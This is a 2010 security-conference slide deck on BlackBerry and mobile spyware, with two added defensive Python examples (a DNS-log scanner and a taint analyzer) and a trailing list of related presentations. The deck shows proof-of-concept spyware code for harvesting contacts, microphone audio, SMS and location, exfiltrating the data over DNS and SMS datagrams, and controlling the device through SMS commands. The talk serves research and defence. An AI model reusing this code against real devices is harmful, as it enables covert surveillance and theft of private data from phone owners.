Smartphone Backdoors
An Analysis of Blackberry and Other Mobile Device Spyware




The Monkey Steals The Berries
Presenter Background

Currently
       Sr. Security Researcher, Veracode, Inc.

Previously
       Security Consultant - Symantec
       Security Consultant - @Stake
       Incident Response and Forensics
           Handler – US Government

Wishes He Was
       Infinitely Rich
       Personal Trainer to hot Hollywood starlets




© 2010 Veracode, Inc.                            3
Mobile Spyware

• Often includes modifications to legitimate programs designed to compromise the device or device data
• Often inserted by those who have legitimate access to source code or distribution binaries
• May be intentional or inadvertent
• Not specific to any particular programming language
• Not specific to any particular mobile Operating System


Attacker Motivation

• Practical method of compromise for many systems
      – Let the users install your backdoor on systems you have no access to
      – Looks like legitimate software so may bypass mobile AV
• Retrieve and manipulate valuable private data
      – Looks like legitimate application traffic so little risk of detection
• For high value targets such as financial services and government it becomes cost effective and more reliable
      – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation
      – Think “Aurora” for Mobile Devices




Why is Mobile The Future of Spyware




Units Sold By Operating System

[Bar chart: units sold per operating system, 2008 Units vs. 2009 Units. Y-axis: Units Sold. X-axis: Operating System (Symbian, Research In Motion, iPhone OS, Microsoft Windows Mobile, Linux, Android, WebOS, Other OSs). Data Source: DISTMO Appstore Analytics, www.appstore.info]




Units Sold Market Growth

[Bar chart: Y-axis: Percentage Growth in Market Share. X-axis: Operating System (Symbian, Research In Motion, iPhone OS, Microsoft Windows Mobile, Linux, Android, WebOS, Other OSs). Data Source: DISTMO Appstore Analytics, www.appstore.info]




Application Counts

[Bar chart: Number Of Applications In Store, Last Counted Jan/Feb 2010, by Marketplace Name. iPhone App Store: 150,998; Android Marketplace: 19,897; Nokia Ovi Store (Maemo): 6118; Blackberry App World: 5291; Palm App Catalog: 1452; Windows Marketplace: 944. Data Source: DISTMO Appstore Analytics, www.appstore.info]




iPhone Applications Sold

[Chart: Y-axis: Applications Sold (In Billions). Data Source: Gartner, Inc., a research and advisory firm]




Back To The Future




Case Studies of Mobile Spyware




FlexiSpy

• http://www.flexispy.com
• $149 - $350 PER YEAR depending on features
• Features
      – Remote Listening
      – C&C Over SMS
      – SMS and Email Logging
      – Call History Logging
      – Location Tracking
      – Call Interception
      – GPS Tracking
      – Symbian, Blackberry, Windows Mobile Supported


Mobile Spy

• http://www.mobile-spy.com
• $49.97 PER QUARTER or $99.97 PER YEAR
• Features
      – SMS Logging
      – Call Logging
      – GPS Logging
      – Web URL Logging
      – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian




Etisalat (SS8)

• Cell carrier in United Arab Emirates (UAE)
• Pushed via SMS as “software patch” for Blackberry smartphones
• Upgrade urged to “enhance performance” of Blackberry service
• Blackberry PIN messaging as C&C
• Sets FLAG_HIDDEN bit to true
• Interception of outbound email / SMS only
• Discovered because a flooded listener server caused retries that drained the batteries of affected devices
• Accidentally released the .jar as well as the .cod (ooopsie?!)




Bugs & Phonesnoop

• Bugs
      – Exfiltration of inbound and outbound email
      – Hidden

• PhoneSnoop
      – Remotely turn on a Blackberry phone microphone
      – Listen in on target ambient conversation




Storm8 Phone Number Farming

      – iMobsters and Vampires Live (and others)
      – “Storm8 has written the software for all its games in such a way that it
        automatically accesses, collects, and transmits the wireless telephone
        number of each iPhone user who downloads any Storm8 game," the suit
        alleges. " ... Storm8, though, has no reason whatsoever to access the
        wireless phone numbers of the iPhones on which its games are installed."
      – “Storm8 says that this code was used in development tests, only
        inadvertently remained in production builds, and removed as soon as it was
        alerted to the issue.”


      – These were available via the iTunes App Store!
      – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html




Symbian Sexy Space

      – Poses as legitimate server ACSServer.exe
      – Calls itself 'Sexy Space'
      – Steals phone and network information
      – Exfiltrates data via hacker owned web site connection
      – Can SPAM contact list members
      – Basically a “botnet” for mobile phones
      – Signing process
            • Anti-virus scan using F-Secure
                - Approx 43% proactive detection rate (PCWorld)
            • Random selection of inbound manually assessed
      – Symbian signed this binary as safe!
      – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm


09Droid – Banking Applications Attack

      – Droid app that masquerades as any number of different target banking applications
      – Target banks included
            • Royal Bank of Canada
            • Chase
            • BB&T
            • SunTrust
            • Over 50 total financial institutions were affected
      – May steal and exfiltrate banking credentials
      – Approved and downloaded from Google’s Android Marketplace!
      – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-market
      – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953
      – http://www.f-secure.com/weblog/archives/00001852.html

Blackberry Security Mechanisms




Blackberry Takes Security Seriously

• KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware
  http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB05499
• Protecting the BlackBerry device platform against malware
  http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf
• Placing the BlackBerry Enterprise Solution in a segmented network
  http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf
• BlackBerry Enterprise Server Policy Reference Guide
  http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Reference_Guide.pdf

Does It Really Matter?!

Only 23% of smartphone owners use the security software installed on the devices.
(Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009)

13% of organizations currently protect from mobile viruses
(Mobile Security 2009 Survey by Goode Intelligence)




Code Signing

• Subset of Blackberry API considered “controlled”
• Use of controlled package, class, or method requires appropriate code signature
• Blackberry Signature Tool comes with the Blackberry JDE
• Acquire signing keys by filling out a web form and paying $20
      – This is not a high barrier to entry
      – 48 hours later you receive signing keys
• Install keys into signature tool




Code Signing Process

• Hash of code sent to RIM for API tracking purposes only
• RIM does not get source code
• COD file is signed based on required keys
• Application ready to be deployed

• Easy to acquire anonymous keys




IT Policies

• Requires connection to Blackberry Enterprise Server (BES)
• Supersedes lower levels of security restrictions
• Prevent devices from downloading third-party applications over wireless
• Prevent installation of specific third-party applications
• Control permissions of third party applications
      – Allow Internal Connections
      – Allow Third-Party Apps to Use Serial Port
      – Allow External Connections
• MOSTLY “Default Allow All” policy for BES and non-BES devices


Application Policies

• Can be controlled at the BES
• If no BES present, controls are set on the handheld itself
• Can only be MORE restrictive than the IT policy, never less
• Control individual resource access per application
• Control individual connection access per application
• MOSTLY “Default Allow All” policy for BES and non-BES devices




V4.7.0.148 Default 3rd Party Application Permissions

USB Connections      Bluetooth Connections     Phone Connections       Location Data
Internet             IPC                       Device Settings
Media                Application Management    Themes                  Input Simulation
Browser Filtering    Recording                 Security Timer Reset
Email Data           Organizer Data            Files                   Security Data


V5.0.0.328 Default 3rd Party Application Permissions

USB Connections      Bluetooth Connections     Phone Connections       Location Data
Server Network       Internet                  IPC                     Device Settings
Media                Application Management    Themes                  Input Simulation
Browser Filtering    Recording                 Security Timer Reset    Display Information While Locked
Email Data           Organizer Data            Files                   Security Data


V5.0.0.328 Trusted 3rd Party Application Permissions

USB Connections      Bluetooth Connections     Phone Connections       Location Data
Server Network       Internet                  IPC                     Device Settings
Media                Application Management    Themes                  Input Simulation
Browser Filtering    Recording                 Security Timer Reset    Display Information While Locked
Email Data           Organizer Data            Files                   Security Data


Installation Methods




Installation Methods

• Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)
• Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer
• Blackberry BES push the application to your user community

• Get it into the Blackberry App World and let the user choose to install it for you!




Installation Files

• .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.
• .JAD files: An application descriptor that stores information about the application itself and the location of .COD files
• .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.
• .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located




txsBBSpy Effects and Behaviors




txsBBSpy Logging and Dumping

• Monitor connected / disconnected calls
• Monitor PIM added / removed / updated
• Monitor inbound SMS
• Monitor outbound SMS
• Real Time track GPS coordinates

• Dump all contacts
• Dump current location
• Dump phone logs
• Dump email
• Dump microphone capture (security prompted)



txsBBSpy Exfiltration and C&C Methods

• SMS (No CDMA)
• SMS Datagrams (Supports CDMA)
• Email
• HTTP GET
• HTTP POST
• TCP Socket
• UDP Socket
• DNS Exfiltration

• Default command and control to inbound SMS
• TXSPROTO Bidirectional TCP based command and control



txsBBSpy Technical Specifications




Technical Methods

• Data Dumpers
• Listeners
• Exfiltration Methods
• Command and Control




Dump Contact Information
• API
     – javax.microedition.pim
     – net.rim.blackberry.api.pdap
• Pseudocode
    PIM pim = PIM.getInstance();
    BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
    Enumeration eContacts = contacts.items();
    Contact contact = (Contact) eContacts.nextElement();
    if (contacts.isSupportedField(Contact.EMAIL)) {
        if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0);
    }



Dump Microphone
• API
     – javax.microedition.media.control
     – javax.microedition.media.Manager
     – javax.microedition.media.Player
• Pseudocode
    Player p = Manager.createPlayer("capture://audio");
    RecordControl rc = (RecordControl) p.getControl("RecordControl");
    ByteArrayOutputStream os = new ByteArrayOutputStream();
    rc.setRecordStream(os);
    rc.startRecord();




Location Listener

• Create the class that implements LocationListener Interface
• Get LocationProvider instance
• Add LocationListener
• API
      – javax.microedition.location.LocationProvider.getInstance
      – javax.microedition.location.LocationProvider.setLocationListener
• Pseudocode
    ll = new LocListener();
    lp = LocationProvider.getInstance(null);
    lp.setLocationListener(ll, 1, 1, 1);




SMS Outbound Listener

• Create class that implements “SendListener” interface
• Add the SendListener
• API
      – net.rim.blackberry.api.sms.SMS
      – javax.wireless.messaging.TextMessage
• Pseudocode
    sl = new SMSOUTListener();
    SMS.addSendListener(sl);




PIM Listener

• Create the class that implements PIMListListener Interface
• Open Target PIMList and Add PIMListListener
• API
      – javax.microedition.pim.PIM.getInstance()
      – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener
• Pseudocode
    pl = new PhoneLogger();
    pim = PIM.getInstance();
    contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
    contacts.addListener(pl);




SMS Datagram Exfiltration

• API
      – javax.microedition.io.Connector
      – javax.microedition.io.DatagramConnection
      – javax.microedition.io.Datagram
• Pseudocode
    DatagramConnection dc = (DatagramConnection) Connector.open("sms://" + this.pnum + ":3590");
    Datagram d = dc.newDatagram(dc.getMaximumLength());
    byte[] buf = msg.getBytes();
    d.setData(buf, 0, buf.length);
    d.write(buf, 0, buf.length);
    dc.send(d);


DNS Exfiltration

do {
    // Code to trim the message to 200 chars per iteration
    try {
        msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false);
        conn = (DatagramConnection) Connector.open("udp://" + msg2 + "." + this.domain + ":7272;4444");
        conn.close();
    } catch (ConnectionNotFoundException e) {
        return;
    } catch (IOException e) {
        // Do nothing, just catch and ignore
    }
} while (msg.length() > 200);
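
A defender-side view of the lookup pattern above, as an added example that is not part of the original slides: a Python scan of resolver logs that groups Base64-looking leading labels by client and parent domain. The log format (`timestamp client qname`), the addresses, the `collector.example` domain and the thresholds are assumptions constructed for the illustration.

```python
import base64
import re
from collections import defaultdict

MAX_LABEL_LEN = 63  # RFC 1035 limit for one DNS label
B64_LABEL = re.compile(r"^[A-Za-z0-9+/=]+$")


def label_findings(label, min_len=32):
    """Return the reasons a single DNS label looks like encoded payload data."""
    reasons = []
    if len(label) > MAX_LABEL_LEN:
        # Not a valid label at all, so a logged name containing one is an anomaly.
        reasons.append("label-exceeds-63")
    # Ordinary hostnames are lower case; Base64 text mixes cases. This relies
    # on the log preserving the case of the queried name (assumption).
    mixed_case = any(c.isupper() for c in label) and any(c.islower() for c in label)
    if len(label) >= min_len and B64_LABEL.match(label) and mixed_case:
        reasons.append("base64-like-label")
    return reasons


def scan_dns_log(lines, min_distinct=3):
    """Report (client, parent domain) pairs with many distinct suspicious labels.

    One encoded chunk per lookup shows up as a series of different long
    labels under the same parent domain from the same client.
    """
    groups = defaultdict(lambda: {"labels": set(), "reasons": set()})
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _, client, qname = parts
        labels = qname.rstrip(".").split(".")
        # Parent domain = last two labels (assumption: no public-suffix list).
        domain = ".".join(labels[-2:]).lower()
        for label in labels[:-2]:
            reasons = label_findings(label)
            if reasons:
                group = groups[(client, domain)]
                group["labels"].add(label)
                group["reasons"].update(reasons)
    report = []
    for (client, domain), group in sorted(groups.items()):
        if len(group["labels"]) >= min_distinct:
            report.append({
                "client": client,
                "domain": domain,
                "distinct_labels": len(group["labels"]),
                "encoded_chars": sum(len(label) for label in group["labels"]),
                "reasons": sorted(group["reasons"]),
            })
    return report


def build_sample_log():
    """Constructed log lines: benign lookups plus one client sending chunks."""
    def b64(data):
        return base64.b64encode(data).decode("ascii")

    lines = [
        "2010-02-03T10:00:01 10.0.0.21 www.example.com",
        "2010-02-03T10:00:02 10.0.0.21 mail.example.org",
        # Long but lower-case hex label, as a CDN might use: must not be flagged.
        "2010-02-03T10:00:03 10.0.0.21 d1a2b3c4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.cdn.example.org",
    ]
    for i in range(4):
        chunk = f"con{i:02d}:Alice Example;555-0100".encode()
        lines.append(f"2010-02-03T10:01:0{i} 10.0.0.37 {b64(chunk)}.collector.example")
    # A 200-character chunk, the size used in the slide's loop comment.
    big = (b"contact=Alice Example;" * 10)[:200]
    lines.append(f"2010-02-03T10:01:09 10.0.0.37 {b64(big)}.collector.example")
    return lines


if __name__ == "__main__":
    for finding in scan_dns_log(build_sample_log()):
        print(finding)
```
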



Threaded Exfiltration

• Listener based exfiltration methods use separate thread
• Doesn't freeze the UI
• Queues messages outbound if network is slow
• ThreadedSend extends Thread class
• Uses run() method to call exfiltrate()




Command and Control Channels

• Default is inbound SMS communication
• Bi-directional TXSPROTO TCP based command and control
      – Additional Stealth (intentionally not completely invisible)
      – Allows for pretty GUI clients (basic mock up done)
      – Will more easily allow for control of multiple victims
      – Can be used to easily implement novelty attacks
            • Swap the contact databases of two victims
            • Easily have phone A call phone B
            • Integrated Google earth tracking of victim without parsing return email responses
            • Much more shenanigans!




Command and Control Channels

• initCandC(int a)
      – Initializes inbound SMS listener if passed a == 1
      – Kills spyware otherwise
      – Listens for commands and acts accordingly

        TXSDIE           TXSPHLON        TXSPHLOFF        TXSPIMON      TXSPIMOFF

     TXSSLINON           TXSSLINOFF      TXSSLOUTON     TXSSLOUTOFF      TXSGLON

     TXSGLOFF           TXSEXFILSMS     TXSEXFILSMSDG   TXSEXFILEMAIL   TXSEXFILGET

  TXSEXFILPOST          TXSEXFILTCP      TXSEXFILUDP    TXSEXFILDNS     TXSDUMPGPS

    TXSDUMPPL           TXSDUMPEMAIL     TXSDUMPMIC     TXSDUMPCON       TXSPROTO

 TXSPORT[PORT]          TXSPHONE:[PN]    TXSURL[URL]    TXSGTIME:[N]     TXSPING

     TXS:[HOST]           TXSIP:[IP]    TXSEM:[EMAIL]




Methods of Detection and Future Work




Methods of Detection

• Additional Operating System Prompts
      – Remove the “Trust Application” prompt requiring individual configuration
• Signature Based
      – This is how the current anti-virus world is failing
• Sandbox Based Execution Heuristics
      – Still requires execution in a sandbox and is reactive
      – Can't ensure complete execution
• Static Decompilation and Analysis
      – Enumeration of sources of sensitive taint and exfiltration sinks
      – Control/Data flow mapping for tracing sensitive taint from source to sink
      – Compare findings against expected values
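
One way to prototype the source-to-sink idea in the last bullet group, as an added example rather than the presenter's tooling: a line-based taint tracker in Python run over a constructed decompiled snippet. It propagates taint through simple assignments only (no real control-flow graph); the labels, the `expected` policy format and the sample code are assumptions.

```python
import re

# Source APIs are the ones named on the slides; the labels are this example's own.
SOURCES = [
    (re.compile(r"\.openPIMList\("), "pim-data"),
    (re.compile(r'createPlayer\(\s*"capture://audio'), "microphone"),
    (re.compile(r"LocationProvider\.getInstance\("), "location"),
]
SINK = re.compile(r"Connector\.open\((.*)\)")   # network sink used on the slides
SCHEME = re.compile(r'"(\w+)://')
ASSIGN = re.compile(r"^\s*(?:[\w.<>\[\]]+\s+)?(\w+)\s*=(?!=)\s*(.+);\s*$")
STRING = re.compile(r'"[^"]*"')
IDENT = re.compile(r"[A-Za-z_]\w*")

# Constructed sample: what a decompiler might emit for an app that claims to
# be a theme pack but also reads contacts and sends them out over UDP.
SAMPLE_DECOMPILED = """\
PIM pim = PIM.getInstance();
BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);
Contact contact = (Contact) contacts.items().nextElement();
String email = contact.getString(Contact.EMAIL, 0);
String msg = "v=1&e=" + email;
String theme = "dark";
HttpConnection c = (HttpConnection) Connector.open("http://example.invalid/ping?t=" + theme);
DatagramConnection dc = (DatagramConnection) Connector.open("udp://" + msg + ".example.invalid:7272");
"""


def tainted_by(expr, taint):
    """Union of the taint labels carried by identifiers used in expr."""
    labels = set()
    # Drop string literals first so words inside them are not read as variables.
    for ident in IDENT.findall(STRING.sub("", expr)):
        labels |= taint.get(ident, set())
    return labels


def analyze(decompiled, expected):
    """Enumerate sources and sinks, trace flows, and compare with expectations.

    expected maps a source label to the set of sink schemes the app is
    declared to need, e.g. {"location": {"http"}}.
    """
    taint, sources, sinks, flows = {}, set(), [], []
    for lineno, stmt in enumerate(decompiled.splitlines(), start=1):
        found = {label for rx, label in SOURCES if rx.search(stmt)}
        sources |= found
        m = ASSIGN.match(stmt)
        if m:
            lhs, rhs = m.groups()
            labels = found | tainted_by(rhs, taint)
            if labels:
                taint[lhs] = labels
            else:
                taint.pop(lhs, None)  # reassigned from clean data
        s = SINK.search(stmt)
        if s:
            args = s.group(1)
            scheme = SCHEME.search(args)
            scheme = scheme.group(1) if scheme else "unknown"
            sinks.append(scheme)
            flows.extend((label, scheme, lineno)
                         for label in sorted(tainted_by(args, taint)))
    unexpected = [f for f in flows if f[1] not in expected.get(f[0], set())]
    return {"sources": sorted(sources), "sinks": sinks,
            "flows": flows, "unexpected": unexpected}


if __name__ == "__main__":
    result = analyze(SAMPLE_DECOMPILED, expected={})
    for label, scheme, lineno in result["unexpected"]:
        print(f"line {lineno}: {label} reaches {scheme}:// sink")
```
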


Future Work (Offensive AND Defensive)

• Reverse engineer .cod file format
• Continued research into unobstructed installation methods (requires exploitation)
• Infect PC with virus that acts as distribution hub
• Research additional exfiltration methods for tunneling without prompting
• Unrelated but interesting (Other cool ideas)
      – Memory walking for unsigned persistent and runtime storage
      – Combine coddec with application downloads from marketplace
      – Enumerate marketplace for existence of backdoors




Demonstration




Conclusion

• We are currently trusting the vendor application store provider for the majority of our mobile device security
• Minimal methods of real time eradication or detection of spyware type activities
• No easy/automated way to confirm for ourselves what the applications are actually doing




The Monkey Steals the Berries!
                                Questions?
RISE background for project board mtg 2011 04-01RISE background for project board mtg 2011 04-01
RISE background for project board mtg 2011 04-01
 
Green ICT Application Challenge São Paulo
Green ICT Application Challenge São PauloGreen ICT Application Challenge São Paulo
Green ICT Application Challenge São Paulo
 
Guía 17 09-2013 (2)
Guía 17 09-2013 (2)Guía 17 09-2013 (2)
Guía 17 09-2013 (2)
 
How Digital Trends Are Compressing Processes
How Digital Trends Are Compressing ProcessesHow Digital Trends Are Compressing Processes
How Digital Trends Are Compressing Processes
 
Luis Hernandez Power Point
Luis Hernandez   Power PointLuis Hernandez   Power Point
Luis Hernandez Power Point
 
Switzerland, Abi Mc
Switzerland, Abi McSwitzerland, Abi Mc
Switzerland, Abi Mc
 
NPC Interim 2008
NPC Interim 2008NPC Interim 2008
NPC Interim 2008
 
Busiess1
Busiess1Busiess1
Busiess1
 
Luis html
Luis htmlLuis html
Luis html
 
eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10eWomenNetwork - Pam Vaccaro presentation 1/8/10
eWomenNetwork - Pam Vaccaro presentation 1/8/10
 
Ex oo2
Ex oo2Ex oo2
Ex oo2
 

Similar to iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware

The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertisingSeungyul Kim
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyVishal Gurbuxani
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriErol Dizdar
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Erol Dizdar
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Erol Dizdar
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorThe Media Kitchen
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009guestd94b193
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview01Booster
 
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)AP DealFlow
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyBernard Leong
 
Internet world mobile marketing 270410
Internet world mobile marketing 270410Internet world mobile marketing 270410
Internet world mobile marketing 270410Jason Cross
 
Australian broadcasting summit 2011
Australian broadcasting summit 2011Australian broadcasting summit 2011
Australian broadcasting summit 2011Lauren Oldham
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Exicon
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺良太郎 小原
 
Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Roel Honning
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?Web Managers Group
 

Similar to iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware (20)

The rules of mobile advertising
The rules of mobile advertisingThe rules of mobile advertising
The rules of mobile advertising
 
Mobclix Sfmobile
Mobclix SfmobileMobclix Sfmobile
Mobclix Sfmobile
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
 
Mobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile BehaviorMobile 101 Class 1: Technology and Mobile Behavior
Mobile 101 Class 1: Technology and Mobile Behavior
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview
 
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
 
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web EconomyThe Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
 
Seventynine.mobi
Seventynine.mobiSeventynine.mobi
Seventynine.mobi
 
Internet world mobile marketing 270410
Internet world mobile marketing 270410Internet world mobile marketing 270410
Internet world mobile marketing 270410
 
Australian broadcasting summit 2011
Australian broadcasting summit 2011Australian broadcasting summit 2011
Australian broadcasting summit 2011
 
5 mobile trends (2009)
5 mobile trends (2009)5 mobile trends (2009)
5 mobile trends (2009)
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
 
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺
 
Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)Smartphone Strategy (Telecom Operators)
Smartphone Strategy (Telecom Operators)
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
 

More from Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile DeviceTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Tyler Shields
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaTyler Shields
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...Tyler Shields
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesTyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointTyler Shields
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTyler Shields
 
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityIntelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software SecurityTyler Shields
 

More from Tyler Shields (20)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
